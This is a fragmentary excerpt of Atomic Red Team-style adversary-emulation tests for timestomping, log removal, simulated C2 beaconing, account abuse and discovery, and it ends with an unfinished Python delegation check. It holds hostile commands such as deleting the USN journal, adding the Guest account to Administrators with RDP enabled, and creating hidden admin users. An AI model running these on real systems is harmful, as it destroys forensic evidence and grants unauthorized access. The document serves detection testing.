Description: Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
Prereq: A file must exist at the path (..\ExternalPayloads\T1551.006_timestomp.txt) to change the modified time on
if (Test-Path "..\ExternalPayloads\T1551.006_timestomp.txt") {exit 0} else {exit 1}
T1070.006 - Indicator Removal on Host: Timestomp
Windows - Modify file last access timestamp with PowerShell
Description: Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
Prereq: A file must exist at the path ("..\ExternalPayloads\T1551.006_timestomp.txt") to change the last access time on
if (Test-Path "..\ExternalPayloads\T1551.006_timestomp.txt") {exit 0} else {exit 1}
Description: Timestomp kxwn.lock.
Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file.
[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)
Prereq: timestomp.ps1 must be present in ..\ExternalPayloads.
if (Test-Path "..\ExternalPayloads\timestomp.ps1") {exit 0} else {exit 1}
Prereq: kxwn.lock must be present in ..\ExternalPayloads.
if (Test-Path -path "..\ExternalPayloads\kxwn.lock") {exit 0} else {exit 1}
T1070.006 - Indicator Removal on Host: Timestomp
MacOS - Timestomp Date Modified
SetFile -m 01/01/1970 /tmp/T1070.006-modified.txt
Description: Stomps on the modification timestamp of a file using MacOS's SetFile utility
Prereq: The file must exist in order to be timestomped
test -e /tmp/T1070.006-modified.txt && exit 0 || exit 1
Cleanup:
rm -f /tmp/T1070.006-modified.txt
T1070.006 - Indicator Removal on Host: Timestomp
Event Log Manipulations - Time Slipping via PowerShell
Description: Changes the system time on the computer to a time that you specify. It involves altering the system’s clock or adjusting the dates of files, affecting timestamp integrity within Event Logs. This technique can disrupt the sequence of logged events, complicating incident analysis and forensics.
Reference -
https://detect.fyi/event-log-manipulations-1-time-slipping-55bf95631c40
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/set-date?view=powershell-7.4
mkdir -p /var/spool/mail/copy
for file in /var/spool/mail/*; do
  if [ "$(basename "$file")" != "copy" ]; then
    cp -R "$file" /var/spool/mail/copy/
    if [ -f "/var/spool/mail/copy/$(basename "$file")" ]; then
      echo "Modification for Atomic Red Test" >> "/var/spool/mail/copy/$(basename "$file")"
    fi
  fi
done
Description: Copies and modifies mail data on Linux
Prereq: Create dummy file in /var/spool/mail/ if no files exist
if [ -z "$(ls -A /var/spool/mail/)" ]; then exit 1; else exit 0; fi
Cleanup:
rm -rf /var/spool/mail/copy
if [ -f /var/spool/mail/temp ]; then rm /var/spool/mail/temp; fi
Description: Copies and modifies mail data on macOS
Cleanup:
rm -rf ~/Library/Mail/copy
T1070 - Indicator Removal on Host
Indicator Removal using FSUtil
fsutil usn deletejournal /D C:
Description: Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output
will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn
Description: Finds a file by user name (if Disk Quotas are enabled), queries allocated ranges for a file, sets a file's short name, sets a file's valid data length, sets zero data for a file, or creates a new file. Upon execution, no output
will be displayed. More information about fsutil can be found at https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-file
- https://tria.ge/230601-x8x6bsgb24/behavioral2
Cleanup:
rm "..\ExternalPayloads\T1070-2.txt"
T1071.001 - Application Layer Protocol: Web Protocols
Description: This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed.
Use an application such as Wireshark to record the session and observe user agent strings and responses.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
T1071.001 - Application Layer Protocol: Web Protocols
Malicious User Agents - CMD
C:\Windows\System32\Curl.exe -s -A "HttpBrowser/1.0" -m3 www.google.com >nul 2>&1
C:\Windows\System32\Curl.exe -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com >nul 2>&1
C:\Windows\System32\Curl.exe -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com >nul 2>&1
C:\Windows\System32\Curl.exe -s -A "*<|>*" -m3 www.google.com >nul 2>&1
Description: This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed.
Use an application such as Wireshark to record the session and observe user agent strings and responses.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
Prereq: Curl must be installed on system
if (Test-Path C:\Windows\System32\Curl.exe) {exit 0} else {exit 1}
T1071.001 - Application Layer Protocol: Web Protocols
Malicious User Agents - Nix
curl -s -A "HttpBrowser/1.0" -m3 www.google.com
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
curl -s -A "*<|>*" -m3 www.google.com
Description: This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
Description: This test simulates an infected host sending a large volume of DNS queries to a command and control server.
The intent of this test is to trigger threshold-based detection on the number of DNS queries either from a single source system or to a single target domain.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
Description: This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
Description: This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
Upon execution, DNS information about the domain will be displayed for each callout.
Description: This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
The following blogs have more information.
https://github.com/iagox86/dnscat2
https://github.com/lukebaggett/dnscat2-powershell
T1071 - Application Layer Protocol
Telnet C2
T1071\bin\telnet_client.exe 127.0.0.1 --port 23
Description: An adversary may establish Telnet communication from a compromised endpoint to a command and control (C2) server in order to carry out additional attacks on objectives.
Prereq: A command and control (C2) server can be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on a specified server with a specified IP that must be reachable by a client (telnet_client.exe)
Description: Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
verify that the file is saved in the temp directory.
Description: Use living-off-the-land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, verify that a zipped folder named Folder_to_zip.zip
was placed in the temp directory.
Enable Guest account with RDP capability and admin privileges
net user guest /active:yes
net user guest Password123!
net localgroup Administrators guest /add
net localgroup "Remote Desktop Users" guest /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
Description: After execution the default Guest account will be enabled (Active) and added to the Administrators and Remote Desktop Users groups,
and the desktop will allow multiple RDP connections.
Cleanup:
net user guest /active:no >nul 2>&1
net localgroup Administrators guest /delete >nul 2>&1
net localgroup "Remote Desktop Users" guest /delete >nul 2>&1
if 0 NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
if 0 EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
if 0 EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
T1078.001 - Valid Accounts: Default Accounts
Activate Guest Account
net user guest /active:yes
Description: Adversaries can activate the default Guest account, which is disabled by default.
Cleanup:
net user guest /active:no
T1078.001 - Valid Accounts: Default Accounts
Enable Guest Account on macOS
sudo sysadminctl -guestAccount on
Description: This test enables the guest account on macOS using sysadminctl utility.
Cleanup:
sudo sysadminctl -guestAccount off
T1078.003 - Valid Accounts: Local Accounts
Create local account with admin privileges
net user art-test /add
net user art-test -4RTisCool!-321
net localgroup administrators art-test /add
Description: After execution the new account will be active and added to the Administrators group
Cleanup:
net localgroup administrators art-test /delete >nul 2>&1
net user art-test /delete >nul 2>&1
T1078.003 - Valid Accounts: Local Accounts
Create local account with admin privileges - MacOS
Description: Loot local Credentials - Safetykatz technique via function of WinPwn
T1078.003 - Valid Accounts: Local Accounts
Create local account (Linux)
password=$(openssl passwd -1 art)
([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user art -h 0))
su art -c "whoami; exit"
Description: An adversary may wish to create an account with admin privileges to work with. In this test we create an "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
Cleanup:
[ "$(uname)" = 'Linux' ] && userdel art -rf || rmuser -y art
T1078.003 - Valid Accounts: Local Accounts
Reactivate a locked/expired account (Linux)
useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
usermod --lock art
usermod --expiredate "1" art
usermod --unlock art
usermod --expiredate "99999" art
su -c whoami art
Description: A system administrator may have locked and expired a user account rather than deleting it ("the user is coming back, at some stage"). An adversary may reactivate an inactive account in an attempt to appear legitimate.
In this test we create an "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
Cleanup:
userdel -r art
T1078.003 - Valid Accounts: Local Accounts
Reactivate a locked/expired account (FreeBSD)
pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user art -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw user mod art -e +99d
su art
whoami
exit
Description: A system administrator may have locked and expired a user account rather than deleting it ("the user is coming back, at some stage"). An adversary may reactivate an inactive account in an attempt to appear legitimate.
In this test we create an "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
Description: An adversary may try to re-purpose a system account to appear legitimate. In this test we change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. Here is how the nobody entry should look in `/etc/passwd` before the test is executed and right after the cleanup: `# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin`
grep nobody /etc/passwd
pw usermod nobody -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user nobody -h 0
su nobody
whoami
exit
Description: An adversary may try to re-purpose a system account to appear legitimate. In this test we change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. Here is how the nobody entry should look in `/etc/passwd` before the test is executed and right after the cleanup: `# -> nobody:x:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin`
Description: PsExec is a powerful tool most known for its remote management capability. However, it can also be used to run processes as the local system account.
The local system account is a default Windows account which has unrestricted access to all system resources.
Upon successful execution, PsExec.exe will spawn a command prompt which will run 'whoami' as the local system account and then exit.
Prereq: PsExec tool from Sysinternals must exist in the ExternalPayloads directory
Description: Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
Automation runbook to execute malicious code and maintain persistence in their target's environment.
Prereq: Check if terraform is installed.
terraform version
Prereq: Check if Azure CLI and Azure Powershell are installed.
* Login to Azure CLI with "az login", and login to Azure PowerShell with "Connect-AzAccount". Sessions are not shared.
* Azure PowerShell is used in this test as it has better automation performance and error logging than Azure CLI.
Prereq: Create dependency resources using terraform
* If the prereq is not met, navigate to T1078.004-2 using "cd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/"
* Open the "terraform.tfvars" file and fill in the variables with your desired values.
* Re-run -GetPrereqs
Cleanup:
Remove-AzAutomationRunbook -AutomationAccountName ART-AutomationAccountName-T1078-004 -Name ART-RunbookName-T1078-004 -ResourceGroupName ART-ResourceGroupName-T1078-004 -Force
Remove-AzAutomationAccount -ResourceGroupName ART-ResourceGroupName-T1078-004 -Name ART-AutomationAccountName-T1078-004 -Force
Remove-AzResourceGroup -Name ART-ResourceGroupName-T1078-004 -Force
echo "Cleanup should be completed. Run 'terraform destroy' to ensure remaining resources are also deleted."
cd "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/"
terraform destroy -auto-approve
T1078.004 - Valid Accounts: Cloud Accounts
GCP - Create Custom IAM Role
gcloud config set project atomic-test-1
gcloud iam roles create AtomicRedTeamRole --description="Atomic Red Team Custom IAM Role" --permissions=iam.serviceAccounts.get --project=atomic-test-1
Description: This atomic will create a new IAM role. The default role permissions are: *IAM Service Account Get*. The idea for this Atomic came from a rule published by the Elastic team, which
identifies an Identity and Access Management (IAM) custom role creation in Google Cloud Platform (GCP).
Custom roles are user-defined, and allow for the bundling of one or more supported permissions to meet specific needs.
Custom roles will not be updated automatically and could lead to privilege creep if not carefully scrutinized.
Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml
Prereq: Requires gcloud
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
Prereq: Check if user is logged in
gcloud config get-value account
Cleanup:
gcloud iam roles delete AtomicRedTeamRole --project=atomic-test-1
Description: Identify System Info. Upon execution, system info and time info will be displayed.
T1082 - System Information Discovery
System Information Discovery
system_profiler
ls -al /Applications
Description: Identify System Info
T1082 - System Information Discovery
List OS Information
uname -a >> /tmp/T1082.txt
if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> /tmp/T1082.txt; fi
if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> /tmp/T1082.txt; fi
if [ -f /etc/issue ]; then cat /etc/issue >> /tmp/T1082.txt; fi
if [ -f /etc/os-release ]; then cat /etc/os-release >> /tmp/T1082.txt; fi
uptime >> /tmp/T1082.txt
cat /tmp/T1082.txt 2>/dev/null
Description: Identify System Info
Cleanup:
rm /tmp/T1082.txt 2>/dev/null
T1082 - System Information Discovery
Linux VM Check via Hardware
if [ -f /sys/class/dmi/id/bios_version ]; then grep -i amazon /sys/class/dmi/id/bios_version; fi
if [ -f /sys/class/dmi/id/product_name ]; then grep -i "Droplet\|HVM\|VirtualBox\|VMware" /sys/class/dmi/id/product_name; fi
if [ -f /sys/class/dmi/id/chassis_vendor ]; then grep -i "Xen\|Bochs\|QEMU" /sys/class/dmi/id/chassis_vendor; fi
if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|qemu\|domu"; fi
if [ -f /proc/scsi/scsi ]; then grep -i "vmware\|vbox" /proc/scsi/scsi; fi
if [ -f /proc/ide/hd0/model ]; then grep -i "vmware\|vbox\|qemu\|virtual" /proc/ide/hd0/model; fi
if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"; fi
if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"; fi
Description: Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.
Description: Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.
T1082 - System Information Discovery
Griffon Recon
cscript "T1082\src\griffon_recon.vbs"
Description: This script emulates the reconnaissance script seen used by Griffon; it was modified by security researcher Kirk Sayre
in order to simply print the recon results to the screen as opposed to exfiltrating them. [Script](https://gist.github.com/kirk-sayre-work/7cb5bf4e2c7c77fa5684ddc17053f1e5).
For more information see also [https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon](https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon) and [https://attack.mitre.org/software/S0417/](https://attack.mitre.org/software/S0417/)
Prereq: Sample script file must exist on disk at specified location (T1082\src\griffon_recon.vbs)
if (Test-Path "T1082\src\griffon_recon.vbs") {exit 0} else {exit 1}
T1082 - System Information Discovery
Environment variables discovery on windows
set
Description: Identify all environment variables. Upon execution, environment variables and your path info will be displayed.
T1082 - System Information Discovery
Environment variables discovery on freebsd, macos and linux
env
Description: Identify all environment variables. Upon execution, environment variables and your path info will be displayed.
T1082 - System Information Discovery
Show System Integrity Protection status (MacOS)
csrutil status
Description: Read and display System Integrity Protection status. csrutil is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not.
Description: PowerSharpPack - Seatbelt technique via function of WinPwn.
[Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
Description: Upon successful execution, this test will utilize a valid read-only Azure AD user's credentials to conduct a security scan and determine what users exist in a given tenant, as well as identify any admin users.
Once the test is complete, a folder will be output to the temp directory that contains 3 csv files which provide info on the discovered users.
See https://github.com/cyberark/SkyArk
Prereq: The SkyArk AzureStealth module must exist in PathToAtomicsFolder\..\ExternalPayloads.
if (test-path "..\ExternalPayloads\AzureStealth.ps1"){exit 0} else {exit 1}
Description: Enumerate kernel modules installed 3 different ways. Upon successful execution stdout will display kernel modules installed on host 2 times, followed by list of modules matching 'vmw' if present.
T1082 - System Information Discovery
FreeBSD List Kernel Modules
kldstat
kldstat | grep vmm
Description: Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.
T1082 - System Information Discovery
System Information Discovery with WMIC
wmic cpu get name
wmic MEMPHYSICAL get MaxCapacity
wmic baseboard get product
wmic baseboard get version
wmic bios get SMBIOSBIOSVersion
wmic path win32_VideoController get name
wmic path win32_VideoController get DriverVersion
wmic path win32_VideoController get VideoModeDescription
wmic OS get Caption,OSArchitecture,Version
wmic DISKDRIVE get Caption
Get-WmiObject win32_bios
Description: Identify system information with the WMI command-line (WMIC) utility. Upon execution, various system information will be displayed, including: OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions.
https://nwgat.ninja/getting-system-information-with-wmic-on-windows/
Elements of this test were observed in the wild used by Aurora Stealer in late 2022 and early 2023, as highlighted in public reporting:
https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar
https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/
Description: The script gathernetworkinfo.vbs is employed to collect system information such as the operating system, DNS details, firewall configuration, etc. Outputs are stored in c:\Windows\System32\config or c:\Windows\System32\reg. https://www.verboon.info/2011/06/the-gathernetworkinfo-vbs-script/
Description: Looks up country code configured in the registry, likely geofence. Upon execution, country code info will be displayed.
- https://tria.ge/210111-eaz8mqhgh6/behavioral1
Description: Looks up for BIOS information in the registry. BIOS information is often read in order to detect sandboxing environments. Upon execution, BIOS information will be displayed.
- https://tria.ge/210111-eaz8mqhgh6/behavioral1
- https://evasions.checkpoint.com/techniques/registry.html
Description: An adversary will use ESXCLI to enumerate the virtual machines on the host prior to executing a power-off routine.
[Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
Prereq: Check if plink is available.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
Description: Darkside ransomware utilises various ESXCLI commands to obtain information about the ESXi Host.
[Reference](https://www.trendmicro.com/en_ph/research/21/e/darkside-linux-vms-targeted.html)
Prereq: Check if plink is available.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1082 - System Information Discovery
sysctl to gather macOS hardware info
sysctl -n hw.model
Description: Gets the macOS hardware information, which can be used to determine whether the target macOS host is running on a physical or virtual machine. sysctl can be used to gather interesting macOS host data, including hardware information, memory size, logical cpu information, etc.
Description: This action demonstrates how an attacker might gather a system's region and language settings using PowerShell, which could aid in profiling
the machine's location and user language preferences. The command outputs system locale details to a temporary file for further analysis.
Cleanup:
cmd.exe /c del "%TMP%\a.txt"
T1082 - System Information Discovery
Enumerate Available Drives via gdr
powershell.exe -c "gdr -PSProvider 'FileSystem'"
Description: This test simulates an attacker attempting to list the available drives on the system to gather data about file storage locations.
Description: Identify the Operating System Build Number via registry with the reg.exe command.
Upon execution, the OS Build Number will be displayed.
T1083 - File and Directory Discovery
File and Directory Discovery (cmd.exe)
dir /s c:\ >> %temp%\T1083Test1.txt
dir /s "c:\Documents and Settings" >> %temp%\T1083Test1.txt
dir /s "c:\Program Files\" >> %temp%\T1083Test1.txt
dir "%systemdrive%\Users\*.*" >> %temp%\T1083Test1.txt
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\T1083Test1.txt
dir "%userprofile%\Desktop\*.*" >> %temp%\T1083Test1.txt
tree /F >> %temp%\T1083Test1.txt
Description: Find or discover files on the file system. Upon successful execution, this test will output the results of all the data discovery commands to a specified file.
Cleanup:
del %temp%\T1083Test1.txt
T1083 - File and Directory Discovery
File and Directory Discovery (PowerShell)
ls -recurse
get-childitem -recurse
gci -recurse
Description: Find or discover files on the file system. Upon execution, file and folder information will be displayed.
T1083 - File and Directory Discovery
Nix File and Directory Discovery
ls -a >> /tmp/T1083.txt
if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > /tmp/T1083.txt; fi;
file */* *>> /tmp/T1083.txt
cat /tmp/T1083.txt 2>/dev/null
find . -type f
ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'
locate *
which sh
Description: Find or discover files on the file system
References:
http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/
https://perishablepress.com/list-files-folders-recursively-terminal/
Cleanup:
rm /tmp/T1083.txt
T1083 - File and Directory Discovery
Nix File and Directory Discovery 2
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/T1083.txt
if [ -f /etc/mtab ]; then cat /etc/mtab >> /tmp/T1083.txt; fi;
find . -type f -iname *.pdf >> /tmp/T1083.txt
cat /tmp/T1083.txt
find . -type f -name ".*"
Description: Find or discover files on the file system
Description: This test emulates MAZE ransomware's ability to enumerate directories using Powershell.
Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window.
See https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
Description: Launches the DirLister executable for a short period of time and then exits.
Recently seen used by [BlackCat ransomware](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/) to create a list of accessible directories and files.
Prereq: DirLister.exe must exist in the specified path ..\ExternalPayloads\DirLister.exe
if (Test-Path "..\ExternalPayloads\DirLister.exe") {exit 0} else {exit 1}
Description: An adversary uses the find command to enumerate vmdks on an ESXi host.
[Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
Prereq: Check if plink is available.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1083 - File and Directory Discovery
Identifying Network Shares - Linux
findmnt -t nfs
Description: If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
Attackers may then attempt to access these shares for lateral movement or data exfiltration.
Description: Show if a user account has ever logged in remotely
Prereq: Check if lastlog command exists on the machine
if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi
Cleanup:
rm -f /tmp/T1087.001.txt
T1087.001 - Account Discovery: Local Account
Enumerate users and groups
groups
id
Description: Utilize groups and id to enumerate users and groups
T1087.001 - Account Discovery: Local Account
Enumerate users and groups
dscl . list /Groups
dscl . list /Users
dscl . list /Users | grep -v '_'
dscacheutil -q group
dscacheutil -q user
Description: Utilize local utilities to enumerate users and groups
T1087.001 - Account Discovery: Local Account
Enumerate all accounts on Windows (Local)
net user
dir c:\Users\
cmdkey.exe /list
net localgroup "Users"
net localgroup
Description: Enumerate all accounts
Upon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session
T1087.001 - Account Discovery: Local Account
Enumerate all accounts via PowerShell (Local)
net user
get-localuser
get-localgroupmember -group Users
cmdkey.exe /list
ls C:/Users
get-childitem C:\Users\
dir C:\Users\
get-localgroup
net localgroup
Description: Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
T1087.001 - Account Discovery: Local Account
Enumerate logged on users via CMD (Local)
query user
Description: Enumerate logged on users. Upon execution, logged on users will be displayed.
Description: An adversary can use ESXCLI to enumerate a list of all local accounts on an ESXi host.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#account%20enumeration)
Prereq: Check if we have plink
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1087.002 - Account Discovery: Domain Account
Enumerate all accounts (Domain)
net user /domain
net group /domain
Description: Enumerate all accounts
Upon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session
T1087.002 - Account Discovery: Domain Account
Enumerate all accounts via PowerShell (Domain)
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
Description: Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
T1087.002 - Account Discovery: Domain Account
Enumerate logged on users via CMD (Domain)
query user /SERVER:%COMPUTERNAME%
Description: Enumerate logged on users. Upon execution, logged on users will be displayed.
Description: ADRecon extracts and combines information about an AD environment into a report. Upon execution, an Excel file with all of the data will be generated and its
path will be displayed.
Prereq: ADRecon must exist on disk at specified location (..\ExternalPayloads\ADRecon.ps1)
if (Test-Path "..\ExternalPayloads\ADRecon.ps1") {exit 0} else {exit 1}
Description: Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.
reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Description: Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts
reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Description: Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
T1087.002 - Account Discovery: Domain Account
Adfind - Enumerate Active Directory Exchange AD Objects
Description: Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
T1087.002 - Account Discovery: Domain Account
Enumerate Default Domain Admin Details (Domain)
net user administrator /domain
Description: This test will enumerate the details of the built-in domain admin account
T1087.002 - Account Discovery: Domain Account
Enumerate Active Directory for Unconstrained Delegation
Description: Attackers may attempt to query for computer objects with the UserAccountControl property
'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
Prereq: PowerShell ActiveDirectory Module must be installed
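The query described above is a bit test on the userAccountControl attribute. As an added example (not part of Atomic Red Team, and not the test's own command, which the page does not show), the Python below decodes the bitmask, builds the equivalent LDAP filter, and applies the same test to a constructed set of computer objects. The distinguished names and values are hypothetical; the flag bits are the documented userAccountControl values. One caveat the example handles: domain controllers always carry TRUSTED_FOR_DELEGATION, so they are filtered out by default and only member servers and workstations with unconstrained delegation are reported.

```python
# Added example: find computer accounts trusted for unconstrained delegation
# by decoding the userAccountControl bitmask. Sample objects are constructed.

# Documented userAccountControl bits (subset).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",            # domain controllers
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",         # unconstrained delegation
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",  # constrained delegation with protocol transition
}
TRUSTED_FOR_DELEGATION = 0x80000
SERVER_TRUST_ACCOUNT = 0x2000
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(value):
    """Return the names of the flags set in a userAccountControl value."""
    return sorted(name for bit, name in UAC_FLAGS.items() if value & bit)


def unconstrained_delegation_filter():
    """LDAP filter equivalent to the query the test describes: computer objects
    whose userAccountControl has TRUSTED_FOR_DELEGATION (0x80000 = 524288) set."""
    return (
        "(&(objectCategory=computer)"
        f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={TRUSTED_FOR_DELEGATION}))"
    )


def find_unconstrained(computers, include_domain_controllers=False):
    """Apply the same bit test locally to {'dn', 'userAccountControl'} dicts.
    Domain controllers carry TRUSTED_FOR_DELEGATION by design, so they are
    skipped unless asked for; the interesting hits are everything else."""
    hits = []
    for obj in computers:
        uac = int(obj["userAccountControl"])
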